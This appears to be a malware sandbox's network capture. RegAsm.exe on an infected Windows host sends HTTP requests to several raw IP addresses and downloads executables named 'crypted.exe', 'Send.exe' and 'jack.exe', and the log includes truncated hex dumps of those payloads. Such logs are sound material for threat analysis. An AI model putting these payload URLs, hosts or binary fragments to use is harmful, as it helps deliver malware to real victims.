                                                                                                                                                                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 ad 2b dd 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 5d 70 fd 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 a8 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 d1 fd 00 3c 00 00 00 00 50 a5 01 d8 04 03 00 40 16 a5 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 46 00 01 28 00 00 00 00 15 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd+f#]p@` <P@`*F(8 .text6 `.rdata@@.data@.pdata@@.00cfg@@.tls@.text0p- `.text1X@.text2`b`h.rsrcPh@@


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.949710176.111.174.109807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.256469965 CEST197OUTHEAD /kurwa HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 176.111.174.109
                                                                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.949711147.45.44.104807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.260570049 CEST228OUTHEAD /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.880968094 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 418816
                                                                                                                                                                                                                                        Last-Modified: Sat, 21 Sep 2024 07:43:45 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ee7931-66400"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.881385088 CEST220OUTHEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.065464020 CEST312INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 11496960
                                                                                                                                                                                                                                        Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ea6451-af6e00"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.065901041 CEST227OUTHEAD /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.248594999 CEST311INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3037032
                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Sep 2024 05:16:47 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ebb3bf-2e5768"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.249331951 CEST216OUTGET /prog/66e705d09b33c_jack.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432369947 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 4249600
                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Sep 2024 16:05:36 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66e705d0-40d800"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 55 fb d1 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 3e 00 00 38 02 00 00 00 00 00 ae ba 3e 00 00 20 00 00 00 c0 3e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 41 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 60 ba 3e 00 4b 00 00 00 00 e0 3e 00 84 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 41 00 0c 00 00 00 10 ba 3e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_U>8> >@ @A@`>K>. A> H.text> > `.sdata>>@.rsrc.>0>@@.reloc A@@B
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432496071 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: >H0&MPVjO*([<*([<******([<*
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432507992 CEST448INData Raw: 70 72 bb 01 00 70 6f 3d 00 00 0a 72 bf 01 00 70 72 c3 01 00 70 6f 3d 00 00 0a 72 c7 01 00 70 72 cb 01 00 70 6f 3d 00 00 0a 72 d5 00 00 70 72 cf 01 00 70 6f 3d 00 00 0a 72 d3 01 00 70 72 df 01 00 70 6f 3d 00 00 0a a2 25 18 18 8c 53 00 00 01 a2 25
                                                                                                                                                                                                                                        Data Ascii: prpo=rprpo=rprpo=rprpo=rprpo=%S%%rp(R(182 E'-8& 8O($rpriprp(=(>%%rup(>r}
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432518005 CEST1236INData Raw: a2 14 0d 12 03 28 52 00 00 06 26 20 07 00 00 00 38 ae fe ff ff 2a 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00
                                                                                                                                                                                                                                        Data Ascii: (R& 8*0*0*******([<*0*0*0*********
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432528973 CEST1236INData Raw: 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00
                                                                                                                                                                                                                                        Data Ascii: ******************************
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432559013 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 00 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00
                                                                                                                                                                                                                                        Data Ascii: *0*0************0*****([<******([<**
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432569981 CEST1236INData Raw: 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 07
                                                                                                                                                                                                                                        Data Ascii: *0***0****0*0([< (:&rps(9H& 8fr/pq 8Rr9po (:9&rCpt8& 9&rWpr
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.432580948 CEST1236INData Raw: 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 17 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00
                                                                                                                                                                                                                                        Data Ascii: ***([<************([<*****0*****([<****([<
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.433151007 CEST1236INData Raw: 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00
                                                                                                                                                                                                                                        Data Ascii: *****0*0*0*"/*******"*0*"*0*"*0**
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.433223009 CEST1236INData Raw: 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00
                                                                                                                                                                                                                                        Data Ascii: ****0***0*********([<******([<******
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.433233976 CEST1236INData Raw: 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 12 00 00
                                                                                                                                                                                                                                        Data Ascii: ***0*0*0*****0*0***0**********
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:12.573431969 CEST223OUTGET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:12.772156000 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:12 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 361336
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 18:02:03 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66edb89b-58378"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d b7 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 50 05 00 00 08 00 00 00 00 00 00 ee 6e 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 6e 05 00 53 00 00 00 00 80 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 5a 05 00 78 29 00 00 00 a0 05 00 0c 00 00 00 60 6d 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfPn @ `nSZx)`m H.textN P `.rsrcR@@.relocX@BnH^$spkTa|K?wN-mEC9-#f=5spJzs_4vZUOwbnesRv@sO4] VLTV[XvF|hI*$<gbv-Cm<[6R8!m'?jW`JI!k,O<9WXLEq !Q$@,99~%(\|B#a wZV9kFZl[OtGz&c
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:13.056740999 CEST226OUTGET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:13.239353895 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:13 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3037032
                                                                                                                                                                                                                                        Last-Modified: Thu, 19 Sep 2024 05:16:47 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ebb3bf-2e5768"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba f7 20 98 fe 96 4e cb fe 96 4e cb fe 96 4e cb f7 ee dd cb ec 96 4e cb 60 36 89 cb ff 96 4e cb 1b cf 4b ca fc 96 4e cb 23 69 80 cb fa 96 4e cb 23 69 85 cb f0 96 4e cb c5 c8 4d ca f8 96 4e cb c5 c8 4a ca f0 96 4e cb c5 c8 4b ca df 96 4e cb c5 c8 4f ca f8 96 4e cb d9 50 35 cb fc 96 4e cb 69 c8 4f ca d3 96 4e cb fe 96 4f cb 3a 9d 4e cb 69 c8 4b ca a1 96 4e cb 69 c8 4e ca ff 96 4e cb 6c c8 b1 cb ff 96 4e cb fe 96 d9 cb ff 96 4e cb 69 c8 4c ca ff 96 4e cb 52 69 63 68 fe 96 4e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 81 9f 25 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@8!L!This program cannot be run in DOS mode.$ NNNN`6NKN#iN#iNMNJNKNONP5NiONO:NiKNiNNlNNiLNRichNPEL%`8$P@.!@%T\ f>.h)TD*)@P..text@8 `.rdata0P(<@@.datand@.tls@.gfids@@.rsrcf h@@
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:15.249610901 CEST216OUTGET /yuop/66ed9885d9aee_Day2.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 147.45.44.104
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:15.698129892 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:15 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3141632
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ed9885-2ff000"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL))) @)@ `0@))K`)@0O)) H.text) ) `.sdata@))@.rsrc`))@@.reloc@0/@B
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:15.786710024 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:15 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 3141632
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 15:45:09 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Keep-Alive: timeout=120
                                                                                                                                                                                                                                        ETag: "66ed9885-2ff000"
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL))) @)@ `0@))K`)@0O)) H.text) ) `.sdata@))@.rsrc`))@@.reloc@0/@B


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.949712103.130.147.211807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.260890961 CEST203OUTHEAD /Files/1.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 103.130.147.211
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.851077080 CEST275INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 19:40:07 GMT
                                                                                                                                                                                                                                        ETag: "65ba6e-6229234d7ee13"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 6666862
                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.851545095 CEST202OUTGET /Files/1.exe HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: 103.130.147.211
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.021869898 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:08 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 19:40:07 GMT
                                                                                                                                                                                                                                        ETag: "65ba6e-6229234d7ee13"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Content-Length: 6666862
                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 0e 7d ed 66 00 74 5f 00 a6 25 00 00 e0 00 06 01 0b 01 02 23 00 40 48 00 00 c6 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 06 00 00 29 87 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 a0 b3 00 42 00 00 00 00 b0 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b3 00 68 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 f9 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
